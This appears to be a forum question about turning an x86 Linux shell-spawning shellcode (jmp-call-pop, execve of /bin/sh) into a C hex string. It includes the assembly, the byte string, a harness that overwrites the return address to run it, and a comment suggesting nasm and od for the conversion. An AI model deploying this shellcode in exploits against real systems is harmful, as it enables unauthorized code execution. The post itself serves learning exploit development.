# Converting generated shellcode to hexademical

Tags: security, exploit, shellcode

I have written the following shellcode, which spawns a shell.

```
global _start

_start:
        jmp short GotoCall

shellcode:
        pop             esi
        xor             eax, eax
        mov byte        [esi+7], al
        lea             ebx, [esi]
        mov long        [esi + 8], ebx
        mov long        [esi + 12], eax
        mov byte        al, 0x0b
        mov             ebx, esi
        lea             ecx, [esi + 8]
        lea             edx, [esi + 12]
        int             0x80


GotoCall:
        call    shellcode
        db      '/bin/shJAAAAKKKK'
```

I assembled the instructions with nasm and linked it with ld.
I want the assembly instructions to be represented in hexadecimal so that they can be written in the following C code where the variable shellcode contains the above assembly instructions in hexademical. However, doing this manually would be tedious and I want to know if there is a fast way to do this.

```
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
}
```

Comment: I'm not clear exactly what you are wanting to do.  What is the final product you want to get?

Comment: Maybe something like `nasm -f bin -o expl.bin expl.asm` followed by something like `od -tx1 -An expl.bin`?